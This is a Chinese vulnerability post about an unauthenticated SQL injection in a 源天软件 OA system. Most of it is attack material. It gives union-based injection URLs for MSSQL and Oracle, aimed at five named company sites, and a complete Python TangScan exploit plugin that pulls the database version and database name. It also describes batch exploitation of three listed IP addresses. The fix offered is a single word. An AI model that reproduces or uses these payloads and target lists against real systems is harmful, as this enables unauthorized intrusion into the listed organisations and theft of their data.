某OA通用型SQL注入漏洞 -电脑资料

    1）通用型SQL注入漏洞厂商：源天软件

    网址：http://www.visionsoft.com.cn/

    漏洞链接：ServiceAction/com.velcro.base.DataAction

    说明：该oa系统使用mssql和oracle两个类型的数据库，

某OA通用型SQL注入漏洞

    利用POC：

    MsSql数据库：

    ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true

    Oracle数据库：

    ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

    （直接访问即可）：

    MsSql部分

    A）http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    B）http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    C）http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

    Oracle部分

    D）http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

    E）http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true

    2）说好的为了支持 TangScan 而来直接给出编写好的插件代码（本人代码盲，瞎写的，大牛勿喷），等公布时，该插件已经入库 TangScan.com 。

#! /usr/bin/env python# -*- coding: utf-8 -*-"""Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)See the file 'docs/COPYING' for copying permissionauthor: fate0"""import refrom thirdparty import requestsfrom modules.exploit import TSExploit__all__ = ['TangScan']class TangScan(TSExploit):    def __init__(self):        super(self.__class__, self).__init__()        self.info = {            "name": "源天软件OA办公系统 sql 注入MSSQL版漏洞（无需登录）",            "product": "源天",            "product_version": "",            "desc": """                OA办公系统 /ServiceAction/com.velcro.base.DataAction 中的 sql 参数存在注入, 将导致敏感数据泄漏            """,            "license": self.license.TS,            "author": ["Coody"],            "ref": [                {self.ref.wooyun: "暂无"},            ],            "type": self.type.injection,            "severity": self.severity.high,            "privileged": False,            "disclosure_date": "2015-07-22",            "create_date": "2015-07-23",        }        self.register_option({            "url": {                "default": "",                "required": True,                "choices": [],                "convert": self.convert.url_field,                "desc": "目标 url"            }        })        self.register_result({            "status": False,            "data": {                "db_info": {                    "version": "",                    "current_db": ""                }            },            "description": "",            "error": ""        })    def verify(self):        self.print_debug("verify start")        re_version_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))        try:            response = requests.get(exp_url, timeout=15, verify=False)        except Exception, e:            self.result.error = str(e)            return        re_result = re_version_pattern.findall(response.content)        if len(re_result) == 0:            self.result.status = False            return        self.result.status = True        self.result.data.db_info.version = re_result[0]        self.result.description = "目标 {url} 存在sql注入, 目标使用数据库版本为: {db_version}".format(            url=self.option.url,            db_version=re_result[0]        )    def exploit(self):        self.print_debug("exploit start")        re_userinfo_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))        try:            response = requests.get(exp_url, timeout=15, verify=False)        except Exception, e:            self.result.error = str(e)            return        re_result = re_userinfo_pattern.findall(response.content)        if len(re_result) == 0:            self.result.status = False            return        self.result.status = True        self.result.data.db_info.current_db = re_result[0]        self.result.description = "目标 {url} 存在sql注入, 数据库名称为: {current_db}".format(            url=self.option.url,            current_db=self.result.data.db_info.current_db        )if __name__ == '__main__':    from modules.main import main    main(TangScan())

    执行 --mode verify （默认）

    执行 --mode exploit

    插件运行正常，能够顺利输出数据，

电脑资料

    到这里本来应该结束了

    但是我手贱

    给出批量检测网站的脚本测试结果

    测试的网站分别是：

    http://60.12.113.234:8080/

    http://121.14.195.31:8081/

    http://218.246.22.194:8080/

    测试中，直接执行 --mode exploit ，批量获取数据库名称吧。

    测试完毕，看下结果文件 success.txt 内容

    嗯、到这里该结束了···

解决方案：

    过滤